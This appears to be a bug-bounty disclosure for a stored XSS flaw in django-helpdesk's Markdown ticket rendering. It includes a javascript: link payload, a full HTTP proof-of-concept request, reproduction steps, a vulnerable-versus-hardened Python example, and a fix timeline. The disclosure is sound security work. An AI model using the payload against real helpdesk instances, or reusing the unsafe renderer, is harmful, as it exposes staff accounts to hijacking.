Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk


Reported on

Nov 19th 2021


Stored XSS via Markdown at Description or Comment of Ticket


When rendering a ticket description or comment as Markdown, the application does not validate the link destination (in particular its URL scheme), so a user who enters [XSS](javascript:alert(`document.domain`)) gets it rendered as <a href="javascript:alert(document.domain)">XSS</a>. Because the ticket is stored and later viewed by staff, the script runs in the browser of whoever clicks that link.
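As an added example (not django-helpdesk's own code, and not the fix merged for this report), the Python below reproduces the bug with a minimal Markdown-style link renderer that copies the destination into href unchecked, and puts beside it a post-render filter that enforces a URL-scheme allowlist. ALLOWED_URL_SCHEMES, the helper names and the sample inputs are assumptions made for the example; in a real deployment the same filter would be applied to the output of the actual Markdown library.

```python
# Added example, not django-helpdesk code: a minimal link renderer that
# reproduces the reported behaviour (destination copied into href with no
# scheme check) beside a post-render sanitizer enforcing a scheme allowlist.
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist for the example; anything else (javascript:, data:,
# vbscript:, ...) is dropped from href/src attributes.
ALLOWED_URL_SCHEMES = frozenset({"http", "https", "mailto"})

# [label](destination), allowing one level of parentheses inside the
# destination so that javascript:alert(`document.domain`) is captured whole.
LINK_RE = re.compile(r"\[([^\]]+)\]\(((?:[^()\s]|\([^()\s]*\))+)\)")

# Browsers discard ASCII whitespace and C0 controls while parsing a URL, so
# "java\tscript:" still executes as javascript:. Strip them before checking.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def render_links_unsafe(text: str) -> str:
    """The vulnerable behaviour: the destination is escaped for HTML, but its
    scheme is never checked, so a javascript: URL survives into href."""
    out, pos = [], 0
    for m in LINK_RE.finditer(text):
        label, dest = m.group(1), m.group(2)
        out.append(html.escape(text[pos:m.start()]))
        out.append(f'<a href="{html.escape(dest, quote=True)}">{html.escape(label)}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def is_safe_url(url: str) -> bool:
    """Allow relative URLs and allowlisted schemes only, after undoing the
    obfuscations a browser would undo: entities, embedded tabs/newlines, case."""
    candidate = _CONTROL_CHARS.sub("", html.unescape(url))
    scheme = urlsplit(candidate).scheme.lower()
    return scheme == "" or scheme in ALLOWED_URL_SCHEMES


class _LinkSchemeFilter(HTMLParser):
    """Rebuilds rendered HTML, dropping href/src attributes whose scheme is
    not allowed. Comments are discarded; text and attributes are re-escaped."""

    URL_ATTRS = {"href", "src"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def _attrs(self, attrs):
        parts = []
        for name, value in attrs:  # HTMLParser already unescaped the values
            if name in self.URL_ATTRS and (value is None or not is_safe_url(value)):
                continue  # neutralise the link rather than rejecting the whole text
            if value is None:
                parts.append(f" {name}")
            else:
                parts.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(parts)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)} />")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data))


def sanitize_links(rendered_html: str) -> str:
    """Run rendered HTML through the scheme filter and return the rebuilt markup."""
    f = _LinkSchemeFilter()
    f.feed(rendered_html)
    f.close()
    return "".join(f.out)


def render_links_hardened(text: str) -> str:
    """Render first, then filter: the browser sees the HTML, so check the HTML."""
    return sanitize_links(render_links_unsafe(text))


if __name__ == "__main__":
    # Constructed input: the payload quoted in this report.
    payload = "[XSS](javascript:alert(`document.domain`))"
    print(render_links_unsafe(payload))    # href="javascript:..." survives
    print(render_links_hardened(payload))  # <a>XSS</a>
```

Filtering the rendered HTML is preferable to rewriting the Markdown source with a regex, because the output is what the browser actually parses; the scheme check also covers case changes, embedded tab or newline characters and entity-encoded schemes, which a plain `startswith("javascript:")` test would miss.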

Proof of Concept

// PoC.req
POST /tickets/submit/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"

XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"

[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"

-----------------------------69350364819088505273728279714--
Steps to Reproduce

Ticket Description

Go to the public ticket-submission URL without logging in: https://[DOMAIN]/tickets/submit/

In the [Description of your issue] field, enter the payload: [XSS](javascript:alert(`document.domain`))

Ticket Comment

In the [Comment / Resolution] field of an existing ticket, enter the payload: [XSS](javascript:alert(`document.domain`))

The XSS triggers when an admin (or any staff user viewing the ticket) clicks the rendered XSS link in the description or comment. Because the payload is a javascript: link rather than inline script, a click is required; the payload does not fire on page load.


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. Note that Django sets the session cookie HttpOnly by default (SESSION_COOKIE_HTTPONLY = True), so document.cookie will not expose the session ID on a default configuration; the script still runs with the clicking staff user's privileges, however, and can issue same-origin requests (including the CSRF token read from the page) to act as that user.

Timeline

We are processing your report and will contact the django-helpdesk team within 24 hours. (15 days ago)
lethanhphuc submitted a (15 days ago)
We have contacted a member of the django-helpdesk team and are waiting to hear back. (14 days ago)
Garret Wassermann validated this vulnerability. (12 days ago)
lethanhphuc has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Garret Wassermann confirmed that a fix has been merged on a22eb0. (12 days ago)
lethanhphuc has been awarded the fix bounty.
Jamie Slome (3 days ago): CVE published! 🎊